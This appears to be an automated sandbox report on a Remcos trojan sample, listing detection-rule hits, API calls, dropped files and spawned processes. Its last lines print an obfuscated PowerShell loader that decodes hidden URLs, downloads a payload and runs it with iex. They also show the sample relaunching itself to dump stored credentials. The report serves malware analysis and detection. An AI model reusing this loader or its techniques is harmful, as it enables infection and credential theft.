                      Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 5644, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@18/13@4/4
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,4_2_004182CE
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00417952
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,6_2_00410DE1
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,4_2_00418758
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040F474
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041B4A8
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AA4A
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].jsonJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\shietgtst-A57Q98
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Temp\Forfrelsens.vbsJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: Software\0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: Exe0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: Exe0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: Inj0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: Inj0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: 0%s0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: exepath0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: 0%s0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: exepath0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: licence0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: dMG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: PSG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: Administrator0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: User0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: del0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: del0_2_0040E9C5
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCommand line argument: del0_2_0040E9C5
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeSystem information queried: HandleInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2064
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5644
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000005.00000002.2172676550.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4554798686.0000000002DC0000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: wscript.exe, 00000003.00000002.2189557696.0000000005852000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Select * from Win32_Service");
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2198587650.00000000027C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe "C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe"
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\zvvuwrolfaxlvl"
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\kpjewkzmtipqfrcbhk"
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\mroxxckghqhciyqfqvohn"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo 